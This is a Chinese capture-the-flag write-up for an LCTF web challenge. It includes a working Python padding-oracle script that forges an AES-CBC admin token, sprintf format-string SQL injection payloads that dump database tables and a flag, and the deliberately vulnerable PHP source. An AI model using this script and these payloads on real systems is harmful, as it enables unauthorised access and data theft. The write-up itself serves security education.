WriteUp分享 | LCTF的一道padding oracle攻击+sprintf格式化字符串导致的SQL注入
0x00题目
http://111.231.111.54/ 泄露了两个源码 .login.php.swp .admin.php.swp 源码丢在最下面,可用vim -r恢复
第一次接触padding oracle,这题能做出来,真的是要感谢我的朋友Pr0ph3t给我的指点
结合这道题,讲解一下padding oracle的攻击方式
0x01步骤
题目大概是这样的逻辑:
函数一:get_identity()
只有当你以一个账号密码成功登陆后,才会进入get_identity(),此时会生成一个随机的token,然后采用aes-128-cbc的加密方式,用这个随机生成的token和密钥,循环加密生成一个$id,如果生成的$id=admin,那你就有session['isadmin'],所以用随机token,加密得到admin这个id的概率是非常小的,所以基本上所有用账号密码的用户登陆都是guest
那管理员怎么登陆呢?对了,他不用账号密码,用一个特定的token来登陆,就是下面的函数 test_identity()
管理员直接传个特定的token,然后就会被后端的密钥解密,一解密得到的 id 就是admin,就认证成功了。
这个特定的token其实很容易得到,直接用密钥和admin这个id,解密即可生成
但是如果我们不知道密钥,那就需要用padding oracle攻击,来得到这个管理员特定的token,详细的原理可参考以下链接 http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/ http://www.jianshu.com/p/ad8bdd87e131
这里只讲解攻击方式和大致原理:
- 不断用admin和admin去登陆,得到很多token,记住这里的admin,admin不是管理员,可以把它认为是一个很普通的账号,真正的管理员是用token登陆的,这个逻辑当时纳闷了我好久。。。。
- 用登陆得到的很多token,模仿管理员直接用这些token去访问admin.php,那么就会进入test_identity()函数,进行解密操作,这时候的解密,其实就是将middle和IV(token) 逐位异或,如果能符合padding规则,就会生成一个明文,然后拿这个明文hex解码看看是不是admin这个id,是的话就认证成功,不是的话就认证失败
- 所以,如果padding失败,服务器就会返回500错误和error!,原因是这个解密函数解密出错,我们不断获取token去进行padding oracle攻击,直到后端可以正常解密出一个明文,并且不会报错,即使它不是admin,这时候我们就能得到middle的值
- 我们拿middle,去和admin这个id异或,就生成了admin的token!!!
- 或者我们可以随便拿一个admin,admin登陆获得的旧token,然后和middle异或,得到它的明文(id),然后 旧token ^ 旧id ^ admin(新id) = 新IV (admin的token) 数学推导如下
其实这也就是CBC翻转的原理,有时候你知道你的token和解密后对应的明文id,你就能把这两个与admin这个id 三者异或,就能得到admin的token,可参考该文章http://www.jianshu.com/p/7f171477a603
- Padding Oracle Attack的关键在于:
- 攻击者能够获知并修改IV
- 攻击者能够获知解密的结果是否符合padding,如服务器是否报错
- 至此废话完了,一口气敲完的,若写错了请指正,Orz
献上脚本,修改自http://blog.csdn.net/qq_19876131/article/details/61918399
#coding:utf8
import requests
import base64
url='http://111.231.111.54/login.php'
N=16
old_token = 'eHNkaHkxSkxQbEplanFKbQ=='
def inject_token(token):
header={"Cookie":"PHPSESSID=qv6iuvrs0bh3g3c0688ss2cb86;token="+token}
print header
result=requests.get(url,headers=header)
return result
def xor(a, b):
return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])
def pad(string,N):
l=len(string)
if l!=N:
return string+chr(N-l)*(N-l)
def padding_oracle(N):
get=""
for i in xrange(1,N+1):
for j in xrange(0,256):
padding=xor(get,chr(i)*(i-1))
c=chr(0)*(16-i)+chr(j)+padding
result=inject_token(base64.b64encode(c))
print result.content
if "Error!" not in result.content:
get=chr(j^i)+get
break
return get
while 1:
middle1=padding_oracle(N)
print "n"
if(len(middle1)+1==16):
for i in xrange(0,256):
middle=chr(i)+middle1
print "token:"+old_token
print "middle:"+middle
plaintext=xor(middle,old_token);
print "plaintext:"+plaintext
des=pad('admin',N)
tmp=""
print des.encode("base64")
for i in xrange(16):
tmp+=chr(ord(old_token[i])^ord(plaintext[i])^ord(des[i]))
print tmp.encode('base64')
result=inject_token(base64.b64encode(tmp))
if "admin" in result.content:
print result.content
print "success"
exit()
成功以管理员身份,登陆admin.php,并可以传入参数id和title
乍看这两个参数都是做了预处理,再带入sql语句查询 但是看到sprintf(),是一个格式化字符串函数,传入的字符可覆盖自身参数
可参考文章 https://paper.seebug.org/386/ http://www.cnblogs.com/test404/p/7821884.html https://www.seceye.cn/1291.html
当我们传入 id=3&title=%1$ 'or(1)#
这时候,因为后端将 '转译成 ' 形成id=3&title=%1$ 'or(1)#
由于sprintf()的作用,会吞掉$后面的两个字节,也就是 空格和,导致单引号逃逸成功,不会被转译
所以这里就能成功注入了,而且可以union注入,记得对payload进行url编码,毕竟太多乱七八糟的符号
给出相关payload(未url编码)和截图
id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name)) from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#
0x02后端源码
login.php
<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
echo '省略';
}
function get_random_token(){
$random_token = '';
$str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
for($i = 0; $i < 16; $i++){
$random_token .= substr($str, rand(1, 61), 1);
}
return $random_token;
}
function get_identity(){
global $id;
$token = get_random_token();
$c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
$_SESSION['id'] = base64_encode($c);
setcookie("token", base64_encode($token));
if($id === 'admin'){
$_SESSION['isadmin'] = 1;
}else{
$_SESSION['isadmin'] = 0;
}
}
function test_identity(){
if (isset($_SESSION['id'])) {
$c = base64_decode($_SESSION['id']);
$token = base64_decode($_COOKIE["token"]);
if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
if ($u === 'admin') {
$_SESSION['isadmin'] = 1;
return 1;
}
}else{
die("Error!");
}
}
return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
$username = mysql_real_escape_string($_POST['username']);
$password = $_POST['password'];
$result = mysql_query("select password from users where username='" . $username . "'", $con);
$row = mysql_fetch_array($result);
if($row['password'] === md5($password)){
get_identity();
header('location: ./admin.php');
}else{
die('Login failed.');
}
}else{
if(test_identity()){
header('location: ./admin.php');
}else{
show_page();
}
}
?>
admin.php
<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
die('You are not admin');
}
if(isset($_GET['id'])){
$id = mysql_real_escape_string($_GET['id']);
if(isset($_GET['title'])){
$title = mysql_real_escape_string($_GET['title']);
$title = sprintf("AND title='%s'", $title);
}else{
$title = '';
}
$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
$result = mysql_query($sql,$con);
$row = mysql_fetch_array($result);
if(isset($row['title'])&&isset($row['content'])){
echo "<h1>".$row['title']."</h1><br>".$row['content'];
die();
}else{
die("This article does not exist.");
}
}
?>
走过路过,欢迎纠错~
- XCode读取Excel数据(适用于任何数据库)
- ObjectDataSource选择业务对象列表为空的探讨
- ASP.NET Web API自身对CORS的支持: CORS授权检验的实施
- 模版引擎XTemplate与代码生成器XCoder(源码)
- 深度学习让人脸识别准确率不断提升
- 在一个空ASP.NET Web项目上创建一个ASP.NET Web API 2.0应用
- 小论线性变换
- 谈谈基于OAuth 2.0的第三方认证 [下篇]
- Razor Engine,实现代码生成器的又一件利器
- 谈谈基于OAuth 2.0的第三方认证 [上篇]
- 我所理解的RESTful Web API [Web标准篇]
- ASP.NET Web API中的Controller
- iOS 转场动画探究(二)
- Swift 面向对象解析(二)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 小程序上传多张图片到springboot后台,返回可供访问的图片链接
- AndroidStudio Gradle基于友盟的多渠道打包方法
- Android开发之全屏与非全屏的切换设置方法小结
- Android使用GridView实现日历的方法
- Android控件AppWidgetProvider使用方法详解
- R语言使用链梯法Chain Ladder和泊松定律模拟和预测未来赔款数据
- Android ViewPager实现左右滑动的实例
- R语言通过伽玛与对数正态分布假设下的广义线性模型对大额索赔进行评估预测
- R语言中回归模型预测的不同类型置信区间应用比较分析
- 第06期:Prometheus 存储
- 新特性解读 | 数组范围遍历功能
- 技术分享 | MySQL 内存管理初探
- 新特性解读 | 窗口函数的适用场景
- Android自定义View 仿QQ侧滑菜单的实现代码
- Android view随触碰滑动效果